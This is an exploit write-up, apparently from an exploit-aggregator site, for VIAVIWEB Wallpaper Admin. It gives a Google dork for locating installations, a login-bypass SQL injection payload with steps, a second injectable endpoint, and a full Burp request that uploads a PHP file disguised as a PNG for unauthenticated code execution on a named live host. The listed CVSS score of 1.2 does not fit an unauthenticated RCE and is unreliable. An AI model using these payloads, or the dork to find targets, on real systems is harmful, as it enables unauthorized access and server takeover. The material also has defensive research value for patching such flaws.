Exploit for VIAVIWEB Wallpaper Admin SQL Injection / Shell Upload

Name: Exploit for VIAVIWEB Wallpaper Admin SQL Injection / Shell Upload
Rating: 5 (183 reviews)
2022-09-19 | CVSS 1.2
## https://sploitus.com/exploit?id=PACKETSTORM:168419
# Exploit Title: [VIAVIWEB Wallpaper Admin - Multiple vulnrabilities]  
# Google Dork: intext:"Wallpaper Admin" "LOGIN" "password" "Username"  
# Date: [18/09/2022]  
# Exploit Author: [Edd13Mora]  
# Vendor Homepage: [www.viaviweb.com]  
# Version: [N/A]  
# Tested on: [Windows 11 - Kali Linux]  
  
------------------  
SQLI on the Login page  
------------------  
payload --> admin' or 1=1-- -  
---  
POC:  
---  
[1] Disable JavaScript on ur browser put the payload and submit  
[2] Reactive JavaScript and resend the request  
---------------------------  
Authenticated SQL Injection:  
---------------------------  
Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/edit_gallery_image.php?img_id=[number]  
-----------------------------------------------  
Remote Code Execution (RCE none authenticated):  
-----------------------------------------------  
Poc:  
----  
Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/add_gallery_image.php?add=yes  
--------------------  
Burp Request :  
--------------------  
  
POST /hd_wallpaper/add_gallery_image.php?add=yes HTTP/2  
Host: http://googlezik.freehostia.com  
Cookie: _octo=GH1.1.993736861.1663458698; PHPSESSID=qh3c29sbjr009jdg8oraed4o52  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------33893919268150571572221367848  
Content-Length: 467  
Origin: http://googlezik.freehostia.com  
Referer: http://googlezik.freehostia.com/hd_wallpaper/add_gallery_image.php?add=yes  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
Te: trailers  
  
-----------------------------33893919268150571572221367848  
Content-Disposition: form-data; name="category_id"  
  
1  
-----------------------------33893919268150571572221367848  
Content-Disposition: form-data; name="image[]"; filename="poc.php"  
Content-Type: image/png  
  
<?php phpinfo(); ?>  
-----------------------------33893919268150571572221367848  
Content-Disposition: form-data; name="submit"  
  
  
-----------------------------33893919268150571572221367848--  
  
  
Uploaded File can be found here :  
--------------------------------  
http://localhost/PAth-Where-Script-Installed/categories/  
```